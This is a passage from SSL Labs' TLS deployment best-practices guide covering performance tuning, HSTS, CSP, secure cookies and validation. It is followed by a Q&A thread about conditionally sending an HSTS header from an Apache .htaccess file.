The cryptographic handshake, which is used to establish secure connections, is an operation for which the cost is highly influenced by private key size. Using a key that is too short is insecure, but using a key that is too long will result in “too much” security and slow operation. For most web sites, using RSA keys stronger than 2,048 bits and ECDSA keys stronger than 256 bits is a waste of CPU power and might impair user experience. Similarly, there is little benefit to increasing the strength of the ephemeral key exchange beyond 2,048 bits for DHE and 256 bits for ECDHE. There are no clear benefits of using encryption above 128 bits.

3.2 Use Session Resumption

Session resumption is a performance-optimization technique that makes it possible to save the results of costly cryptographic operations and to reuse them for a period of time. A disabled or nonfunctional session resumption mechanism may introduce a significant performance penalty.
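
As an illustration, assuming Apache httpd with mod_socache_shmcb, a shared session cache might be configured like this (the path and sizes are hypothetical):

# Inter-process cache for TLS sessions, with a one-day lifetime
SSLSessionCache shmcb:/run/httpd/ssl_scache(512000)
SSLSessionCacheTimeout 86400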

3.3 Use WAN Optimization and HTTP/2

These days, TLS overhead doesn’t come from CPU-hungry cryptographic operations, but from network latency. A TLS handshake, which can start only after the TCP handshake completes, requires a further exchange of packets and is more expensive the further away you are from the server. The best way to minimize latency is to avoid creating new connections—in other words, to keep existing connections open for a long time (keep-alives). Other techniques that provide good results include supporting modern protocols such as HTTP/2 and using WAN optimization (usually via content delivery networks).

3.4 Cache Public Content

When communicating over TLS, browsers might assume that all traffic is sensitive. They will typically cache certain resources in memory, but once you close the browser, all the content may be lost. To gain a performance boost and enable long-term caching of some resources, mark public resources (e.g., images) as public, as in the example below.
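
For example, a static image that is safe to cache anywhere might be served with a response header such as:

Cache-Control: public, max-age=31536000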

3.5 Use OCSP Stapling

OCSP stapling is an extension of the OCSP protocol that delivers revocation information as part of the TLS handshake, directly from the server. As a result, the client does not need to contact OCSP servers for out-of-band validation and the overall TLS connection time is significantly reduced. OCSP stapling is an important optimization technique, but you should be aware that not all web servers provide solid OCSP stapling implementations. Combined with a CA that has a slow or unreliable OCSP responder, such web servers might create performance issues. For best results, simulate failure conditions to see if they might impact your availability.
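
As a sketch, assuming Apache httpd 2.4 with mod_ssl, stapling is enabled with two directives (the cache path is hypothetical, and SSLStaplingCache must be set outside any virtual host):

SSLUseStapling on
SSLStaplingCache shmcb:/run/httpd/ocsp_scache(128000)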

3.6 Use Fast Cryptographic Primitives

In addition to providing the best security, my recommended cipher suite configuration also provides the best performance. Whenever possible, use CPUs that support hardware-accelerated AES. After that, if you really want a further performance edge (probably not needed for most sites), consider using ECDSA keys.

4 HTTP and Application Security

The HTTP protocol and the surrounding platform for web application delivery continued to evolve rapidly after SSL was born. As a result of that evolution, the platform now contains features that can be used to defeat encryption. In this section, we list those features, along with ways to use them securely.

4.1 Encrypt Everything

The fact that encryption is optional is probably one of the biggest security problems today. We see the following problems:

  • No TLS on sites that need it
  • Sites that have TLS but that do not enforce it
  • Sites that mix TLS and non-TLS content, sometimes even within the same page
  • Sites with programming errors that subvert TLS

Although many of these problems can be mitigated if you know exactly what you’re doing, the only way to reliably protect web site communication is to enforce encryption throughout—without exception.

4.2 Eliminate Mixed Content

Mixed-content pages are those that are transmitted over TLS but include resources (e.g., JavaScript files, images, CSS files) that are not transmitted over TLS. Such pages are not secure. An active man-in-the-middle (MITM) attacker can piggyback on a single unprotected JavaScript resource, for example, and hijack the entire user session. Even if you follow the advice from the previous section and encrypt your entire web site, you might still end up retrieving some resources unencrypted from third-party web sites.

4.3 Understand and Acknowledge Third-Party Trust

Web sites often use third-party services activated via JavaScript code downloaded from another server. A good example of such a service is Google Analytics, which is used on large parts of the Web. Such inclusion of third-party code creates an implicit trust connection that effectively gives the other party full control over your web site. The third party may not be malicious, but large providers of such services are increasingly seen as targets. The reasoning is simple: if a large provider is compromised, the attacker is automatically given access to all the sites that depend on the service.

If you follow the advice from Section 4.2, at least your third-party links will be encrypted and thus safe from MITM attacks. However, you should go a step further than that: learn what services you use and remove them, replace them with safer alternatives, or accept the risk of their continued use. A new technology called subresource integrity (SRI) could be used to reduce the potential exposure via third-party resources.[3]
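
For example, a third-party script protected with SRI declares the expected hash of its content; the URL here is hypothetical and the hash is left as a placeholder:

<script src="https://third-party.example.com/library.js"
        integrity="sha384-..."
        crossorigin="anonymous"></script>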

4.4 Secure Cookies

To be properly secure, a web site requires TLS, but also that all its cookies are explicitly marked as secure when they are created. Failure to secure the cookies makes it possible for an active MITM attacker to tease some information out through clever tricks, even on web sites that are 100% encrypted. For best results, consider adding cryptographic integrity validation or even encryption to your cookies.
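
For example, a session cookie should be created with the Secure flag set (HttpOnly is a sensible companion; the cookie value is a placeholder):

Set-Cookie: SID=31d4d96e407aad42; Secure; HttpOnly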

4.5 Secure HTTP Compression

The 2012 CRIME attack showed that TLS compression can’t be implemented securely. The only solution was to disable TLS compression altogether. The following year, two further attack variations followed. TIME and BREACH focused on secrets in HTTP response bodies compressed using HTTP compression. Unlike TLS compression, HTTP compression is a necessity and can’t be turned off. Thus, to address these attacks, changes to application code need to be made.[4]

TIME and BREACH attacks are not easy to carry out, but if someone is motivated enough to use them, the impact is roughly equivalent to a successful Cross-Site Request Forgery (CSRF) attack.

4.6 Deploy HTTP Strict Transport Security

HTTP Strict Transport Security (HSTS) is a safety net for TLS. It was designed to ensure that security remains intact even in the case of configuration problems and implementation errors. To activate HSTS protection, you add a new response header to your web sites. After that, browsers that support HSTS (all modern browsers at this time) enforce it.

The goal of HSTS is simple: after activation, it does not allow any insecure communication with the web site that uses it. It achieves this goal by automatically converting all plaintext links to secure ones. As a bonus, it also disables click-through certificate warnings. (Certificate warnings are an indicator of an active MITM attack. Studies have shown that most users click through these warnings, so it is in your best interest to never allow them.)

Adding support for HSTS is the single most important improvement you can make for the TLS security of your web sites. New sites should always be designed with HSTS in mind and the old sites converted to support it wherever possible and as soon as possible. For best security, consider using HSTS preloading,[5] which embeds your HSTS configuration in modern browsers, making even the first connection to your site secure.

The following configuration example activates HSTS on the main hostname and all its subdomains for a period of one year, while also allowing preloading:

Strict-Transport-Security: max-age=31536000; includeSubDomains; preload

4.7 Deploy Content Security Policy

Content Security Policy (CSP) is a security mechanism that web sites can use to restrict browser operation. Although initially designed to address Cross-Site Scripting (XSS), CSP is constantly evolving and supports features that are useful for enhancing TLS security. In particular, it can be used to restrict mixed content when it comes to third-party web sites, for which HSTS doesn’t help.

To deploy CSP to prevent third-party mixed content, use the following configuration:

Content-Security-Policy: default-src https: 'unsafe-inline' 'unsafe-eval';
                         connect-src https: wss:

Note

This is not the best way to deploy CSP. In order to provide an example that doesn’t break anything except mixed content, I had to disable some of the default security features. Over time, as you learn more about CSP, you should change your policy to bring them back.

4.8 Do Not Cache Sensitive Content

All sensitive content must be communicated only to the intended parties and treated accordingly by all devices. Although proxies do not see encrypted traffic and cannot share content among users, the use of cloud-based application delivery platforms is increasing, which is why you need to be very careful when specifying what is public and what is not.
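
For example, a response carrying sensitive content can opt out of caching entirely with a header such as:

Cache-Control: no-cache, no-store, must-revalidate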

4.9 Consider Other Threats

TLS is designed to address only one aspect of security—confidentiality and integrity of the communication between you and your users—but there are many other threats that you need to deal with. In most cases, that means ensuring that your web site does not have other weaknesses.

5 Validation

With many configuration parameters available for tweaking, it is difficult to know in advance what impact certain changes will have. Further, changes are sometimes made accidentally; software upgrades can introduce changes silently. For that reason, we advise that you use a comprehensive SSL/TLS assessment tool initially to verify your configuration to ensure that you start out secure, and then periodically to ensure that you stay secure. For public web sites, we recommend the free SSL Labs server test.[6]
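
For a quick manual spot check between full assessments, the OpenSSL client shows the negotiated protocol, cipher suite, and certificate chain (the hostname is hypothetical):

openssl s_client -connect www.example.com:443 -servername www.example.com < /dev/null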

6 Advanced Topics

The following advanced topics are currently outside the scope of our guide. They require a deeper understanding of SSL/TLS and Public Key Infrastructure (PKI), and they are still being debated by experts.

6.1 Public Key Pinning

Public key pinning is designed to give web site operators the means to restrict which CAs can issue certificates for their web sites. This feature has been deployed by Google for some time now (hardcoded into their browser, Chrome) and has proven to be very useful in preventing attacks and making the public aware of them. In 2014, Firefox also added support for hardcoded pinning. A standard called Public Key Pinning Extension for HTTP[7] is now available. Public key pinning addresses the biggest weakness of PKI (the fact that any CA can issue a certificate for any web site), but it comes at a cost: deployment requires significant effort and expertise, and it creates a risk of losing control of your site (if you end up with an invalid pinning configuration). You should consider pinning only if you’re managing a site that might realistically be attacked via a fraudulent certificate.

6.2 DNSSEC and DANE

Domain Name System Security Extensions (DNSSEC) is a set of technologies that add integrity to the domain name system. Today, an active network attacker can easily hijack any DNS request and forge arbitrary responses. With DNSSEC, all responses can be cryptographically traced back to the DNS root. DNS-based Authentication of Named Entities (DANE) is a separate standard that builds on top of DNSSEC to provide bindings between DNS and TLS. DANE could be used to augment the security of the existing CA-based PKI ecosystem or bypass it altogether.

Even though not everyone agrees that DNSSEC is a good direction for the Internet, support for it continues to improve. Browsers don’t yet support either DNSSEC or DANE (preferring similar features provided by HSTS and HPKP instead), but there is some indication that they are starting to be used to improve the security of email delivery.

7 Changes

The first release of this guide was on 24 February 2012. This section tracks the document changes over time, starting with version 1.3.

Version 1.3 (17 September 2013)

The following changes were made in this version:

  • Recommend replacing 1024-bit certificates straight away.
  • Recommend against supporting SSL v3.
  • Remove the recommendation to use RC4 to mitigate the BEAST attack server-side.
  • Recommend that RC4 is disabled.
  • Recommend that 3DES is disabled in the near future.
  • Warn about the CRIME attack variations (TIME and BREACH).
  • Recommend supporting forward secrecy.
  • Add discussion of ECDSA certificates.

Version 1.4 (8 December 2014)

The following changes were made in this version:

  • Discuss SHA1 deprecation and recommend migrating to the SHA2 family.
  • Recommend that SSL v3 is disabled and mention the POODLE attack.
  • Expand Section 3.1 to cover the strength of the DHE and ECDHE key exchanges.
  • Recommend OCSP Stapling as a performance-improvement measure, promoting it to Section 3.5.

Version 1.5 (8 June 2016)

The following changes were made in this version:

  • Refreshed the entire document to keep up with the times.
  • Recommended use of authenticated cipher suites.
  • Spent more time discussing key exchange strength and the Logjam attack.
  • Removed the recommendation to disable client-initiated renegotiation. Modern software does this anyway, and it might be impossible or difficult to disable it with something older. At the same time, the DoS vector isn’t particularly strong. Overall, I feel it’s better to spend available resources fixing something else.
  • Added a warning about flaky OCSP stapling implementations.
  • Added mention of subresource integrity enforcement.
  • Added mention of cookie integrity validation and encryption.
  • Added mention of HSTS preloading.
  • Recommended using CSP for better handling of third-party mixed content.
  • Mentioned FREAK, Logjam, and DROWN attacks.
  • Removed the section that discussed mitigation of various TLS attacks, which are largely obsolete by now, especially if the advice presented here is followed. Moved discussion of CRIME variants into a new section.
  • Added a brief discussion of DNSSEC and DANE to the Advanced section.

Version 1.6 (15 January 2020)

The following changes were made in this version:

  • Refreshed the entire document to keep up with the times.
  • Added details on using SAN (Subject Alternative Name), since the Common Name is ignored by the latest browsers.
  • Noted SHA1 signature deprecation for leaf and intermediate certificates.
  • Added DNS CAA information and recommended its use.
  • Added information about the extra download of missing intermediate certificate and the sequence of it.
  • Recommended the use of TLS v1.3.
  • Recommended against using the legacy protocols TLS v1.0 and TLS v1.1.
  • Improved the secure cipher suites section with more information and newly discovered weak/insecure ciphers.
  • Updated HSTS preload footnotes link.

Acknowledgments

Special thanks to Marsh Ray, Nasko Oskov, Adrian F. Dimcev, and Ryan Hurst for their valuable feedback and help in crafting the initial version of this document. Also thanks to many others who generously share their knowledge of security and cryptography with the world. The guidelines presented here draw on the work of the entire security community.

About SSL Labs

SSL Labs (www.ssllabs.com) is Qualys’s research effort to understand SSL/TLS and PKI as well as to provide tools and documentation to assist with assessment and configuration. Since 2009, when SSL Labs was launched, hundreds of thousands of assessments have been performed using the free online assessment tool. Other projects run by SSL Labs include periodic Internet-wide surveys of TLS configuration and SSL Pulse, a monthly scan of about 150,000 of the most popular TLS-enabled web sites in the world.

About Qualys

Qualys, Inc. (NASDAQ: QLYS) is a pioneer and leading provider of cloud-based security and compliance solutions with over 9,300 customers in more than 100 countries, including a majority of each of the Forbes Global 100 and Fortune 100. The Qualys Cloud Platform and integrated suite of solutions help organizations simplify security operations and lower the cost of compliance by delivering critical security intelligence on demand and automating the full spectrum of auditing, compliance and protection for IT systems and web applications. Founded in 1999, Qualys has established strategic partnerships with leading managed service providers and consulting organizations including Accenture, BT, Cognizant Technology Solutions, Deutsche Telekom, Fujitsu, HCL, HP Enterprise, IBM, Infosys, NTT, Optiv, SecureWorks, Tata Communications, Verizon and Wipro. The company is also a founding member of the Cloud Security Alliance (CSA). For more information, please visit www.qualys.com.

[1] Transport Layer Security (TLS) Parameters (IANA, retrieved 18 March 2016)

[2] Weak Diffie-Hellman and the Logjam Attack (retrieved 16 March 2016)

[3] Subresource Integrity (Mozilla Developer Network, retrieved 16 March 2016)

[4] Defending against the BREACH Attack (Qualys Security Labs; 7 August 2013)

[5] HSTS Preload List (Google developers, retrieved 16 March 2016)

[6] SSL Labs (retrieved 16 March 2016)

[7] RFC 7469: Public Key Pinning Extension for HTTP (Evans et al, April 2015)

[8] RFC 6844: DNS Certification Authority Authorization (CAA) Resource Record (Hallam-Baker and Stradling, January 2013)

Source:
https://github.com/ssllabs/research/wiki/SSL-and-TLS-Deployment-Best-Practices

Warning: Unnecessary HSTS header over HTTP

We would like to add the HSTS header to our page https://www.wipfelglueck.de. Our page is running on a shared server, so we don’t have access to httpd.conf. We tried to enable this header via the .htaccess file like this:

<IfModule mod_headers.c>
  DefaultLanguage de
  Header set X-XSS-Protection "1; mode=block"
  Header set X-Frame-Options "sameorigin"
  Header set X-Content-Type-Options "nosniff"

  Header set X-Permitted-Cross-Domain-Policies "none"

  Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload"

  Header set Referrer-Policy "no-referrer"

  <FilesMatch "\.(js|css|xml|gz)$">
    Header append Vary Accept-Encoding
  </FilesMatch>

  <FilesMatch "\.(ico|jpg|jpeg|png|gif|webp)$">
    Header set Cache-Control "max-age=2592000, public"
  </FilesMatch>
  <FilesMatch "\.(css|js|json|html)$">
    Header set Cache-Control "max-age=604800, public"
  </FilesMatch>
</IfModule>

When we check the page, we receive the warning mentioned in the subject, with this text:
“The HTTP page at http://wipfelglueck.de sends an HSTS header. This has no effect over HTTP, and should be removed.”

I tried several ways to solve this but have not been successful so far. On the web I can’t find a solution, so I would be happy if you could give me a hint on this!

Thank you very much!!


Thank you very much for your response!
With the header:

Header always set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS

or

Header set Strict-Transport-Security "max-age=31536000; includeSubDomains; preload" env=HTTPS

there is no error, the page runs, but when I check the page this error is mentioned:

Error: No HSTS header
Response error: No HSTS header is present on the response.

That’s strange. What did I do wrong?

Answer

You can conditionally set headers using env=

Header always set Strict-Transport-Security "..." env=HTTPS

(you can use both always and env= simultaneously; the former only filters by response status). Note that env=HTTPS tests an Apache environment variable named HTTPS, which is not set in every hosting environment; if it is never set, the header will never be sent, which would explain the “No HSTS header” result.

That being said, do not optimize for benchmarks or compliance checkmarks. Over plain HTTP this header does not do anything, and worrying about it just takes attention away from things that do have an effect. The HSTS header simply has no effect when it is not sent over a secured transport; and since these days (almost) all plaintext requests should simply redirect to https://, the same is true of (almost) any response header sent over http://.

Source:
https://bootpanic.com/warning-unnecessary-hsts-header-over-http/
